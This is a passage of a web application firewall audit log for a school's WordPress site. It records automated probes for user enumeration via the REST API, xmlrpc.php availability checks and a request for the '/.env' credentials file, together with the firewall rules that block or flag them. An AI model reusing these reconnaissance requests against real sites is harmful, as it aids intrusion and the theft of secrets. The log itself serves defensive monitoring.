Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c2af94d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442220725350 4751 (- - -) Stopwatch2: 1747442220725350 4751; combined=3658, p1=456, p2=3002, p3=23, p4=26, p5=89, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c2af94d-Z-- --fe8c904b-A-- [17/May/2025:07:37:45 +0700] aCfaWem4kjNN-hEbWjJAwwAAAFU 103.236.140.4 42902 103.236.140.4 8181 --fe8c904b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe8c904b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe8c904b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442265886939 2783 (- - -) Stopwatch2: 1747442265886939 2783; combined=1245, p1=437, p2=779, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe8c904b-Z-- --4b84436c-A-- [17/May/2025:07:37:51 +0700] aCfaXxKi5m5upc8uMd6hzwAAAMQ 103.236.140.4 42912 103.236.140.4 8181 --4b84436c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4b84436c-C-- demo.sayHello --4b84436c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b84436c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442271410777 5402 (- - -) Stopwatch2: 1747442271410777 5402; combined=4051, p1=536, p2=3300, p3=29, p4=31, p5=92, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b84436c-Z-- --6b1b8533-A-- [17/May/2025:07:38:29 +0700] aCfahXyxdQCiyU1ENFcnFAAAAAw 103.236.140.4 42924 103.236.140.4 8181 --6b1b8533-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.24 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6b1b8533-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b1b8533-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442309377091 2778 (- - -) Stopwatch2: 1747442309377091 2778; combined=1413, p1=480, p2=902, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b1b8533-Z-- --078ea459-A-- [17/May/2025:07:38:32 +0700] aCfaiBKi5m5upc8uMd6h0gAAAMg 103.236.140.4 42928 103.236.140.4 8181 --078ea459-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.35 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --078ea459-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --078ea459-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442312946588 2374 (- - -) Stopwatch2: 1747442312946588 2374; combined=1100, p1=379, p2=693, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --078ea459-Z-- --6933bd18-A-- [17/May/2025:07:38:37 +0700] aCfajXyxdQCiyU1ENFcnFQAAABE 103.236.140.4 42930 103.236.140.4 8181 --6933bd18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.24 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.24 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6933bd18-C-- demo.sayHello --6933bd18-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6933bd18-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442317742079 5022 (- - -) Stopwatch2: 1747442317742079 5022; combined=3873, p1=501, p2=3165, p3=24, p4=30, p5=91, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6933bd18-Z-- --87888b7d-A-- [17/May/2025:07:38:43 +0700] aCfak3yxdQCiyU1ENFcnFwAAABI 103.236.140.4 42936 103.236.140.4 8181 --87888b7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.35 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87888b7d-C-- demo.sayHello --87888b7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87888b7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442323770375 6147 (- - -) Stopwatch2: 1747442323770375 6147; combined=4369, p1=562, p2=3563, p3=40, p4=44, p5=96, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87888b7d-Z-- --94bd5d77-A-- [17/May/2025:07:38:57 +0700] aCfaoem4kjNN-hEbWjJAyAAAAEY 103.236.140.4 42940 103.236.140.4 8181 --94bd5d77-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.99 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --94bd5d77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94bd5d77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442337180140 3395 (- - -) Stopwatch2: 1747442337180140 3395; combined=1445, p1=464, p2=938, p3=0, p4=0, p5=43, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94bd5d77-Z-- --d2156140-A-- [17/May/2025:07:39:03 +0700] aCfapum4kjNN-hEbWjJAygAAAEg 103.236.140.4 42944 103.236.140.4 8181 --d2156140-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.99 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d2156140-C-- demo.sayHello --d2156140-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2156140-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442342997258 6677 (- - -) Stopwatch2: 1747442342997258 6677; combined=4836, p1=598, p2=3998, p3=38, p4=43, p5=95, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2156140-Z-- --2af2a525-A-- [17/May/2025:07:39:37 +0700] aCfayXyxdQCiyU1ENFcnGAAAABM 103.236.140.4 42950 103.236.140.4 8181 --2af2a525-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2af2a525-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2af2a525-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442377900352 3083 (- - -) Stopwatch2: 1747442377900352 3083; combined=1288, p1=411, p2=846, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2af2a525-Z-- --0fc5fe6e-A-- [17/May/2025:07:39:45 +0700] aCfa0em4kjNN-hEbWjJAzAAAAEo 103.236.140.4 42954 103.236.140.4 8181 --0fc5fe6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0fc5fe6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fc5fe6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442385934757 2304 (- - -) Stopwatch2: 1747442385934757 2304; combined=1070, p1=344, p2=686, p3=0, p4=0, p5=40, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fc5fe6e-Z-- --a9e2e151-A-- [17/May/2025:07:39:47 +0700] aCfa0-m4kjNN-hEbWjJAzQAAAEs 103.236.140.4 42956 103.236.140.4 8181 --a9e2e151-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.83 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a9e2e151-C-- demo.sayHello --a9e2e151-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9e2e151-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442387179684 5678 (- - -) Stopwatch2: 1747442387179684 5678; combined=4169, p1=555, p2=3372, p3=32, p4=36, p5=102, sr=76, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9e2e151-Z-- --0252424b-A-- [17/May/2025:07:39:48 +0700] aCfa1HyxdQCiyU1ENFcnGgAAABY 103.236.140.4 42958 103.236.140.4 8181 --0252424b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0252424b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0252424b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442388285171 2249 (- - -) Stopwatch2: 1747442388285171 2249; combined=1009, p1=376, p2=609, p3=0, p4=0, p5=24, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0252424b-Z-- --f9303b3f-A-- [17/May/2025:07:39:50 +0700] aCfa1gTOsBn9MSWb6WJt8QAAAIE 103.236.140.4 42966 103.236.140.4 8181 --f9303b3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9303b3f-C-- demo.sayHello --f9303b3f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9303b3f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442390698487 4653 (- - -) Stopwatch2: 1747442390698487 4653; combined=3629, p1=446, p2=2985, p3=24, p4=24, p5=89, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9303b3f-Z-- --be4c2b70-A-- [17/May/2025:07:39:54 +0700] aCfa2hKi5m5upc8uMd6h1AAAAMs 103.236.140.4 42968 103.236.140.4 8181 --be4c2b70-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --be4c2b70-C-- demo.sayHello --be4c2b70-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --be4c2b70-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747442394653636 6492 (- - -) Stopwatch2: 1747442394653636 6492; combined=4733, p1=615, p2=3879, p3=42, p4=41, p5=93, sr=85, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be4c2b70-Z-- --9a8c915a-A-- [17/May/2025:07:40:29 +0700] aCfa_em4kjNN-hEbWjJA0AAAAE8 103.236.140.4 42974 103.236.140.4 8181 --9a8c915a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.250.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.250.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 6.0; he-il; Redmi Note 4X Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.9.7-g Accept-Charset: utf-8 --9a8c915a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a8c915a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747442429605947 939 (- - -) Stopwatch2: 1747442429605947 939; combined=383, p1=327, p2=0, p3=0, p4=0, p5=55, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a8c915a-Z-- --267c3556-A-- [17/May/2025:07:41:31 +0700] aCfbO3yxdQCiyU1ENFcnIgAAABA 103.236.140.4 42990 103.236.140.4 8181 --267c3556-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --267c3556-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --267c3556-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747442491218098 3144 (- - -) Stopwatch2: 1747442491218098 3144; combined=1405, p1=472, p2=905, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --267c3556-Z-- --e2ef0d07-A-- [17/May/2025:07:41:32 +0700] aCfbPATOsBn9MSWb6WJt8gAAAIA 103.236.140.4 42992 103.236.140.4 8181 --e2ef0d07-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 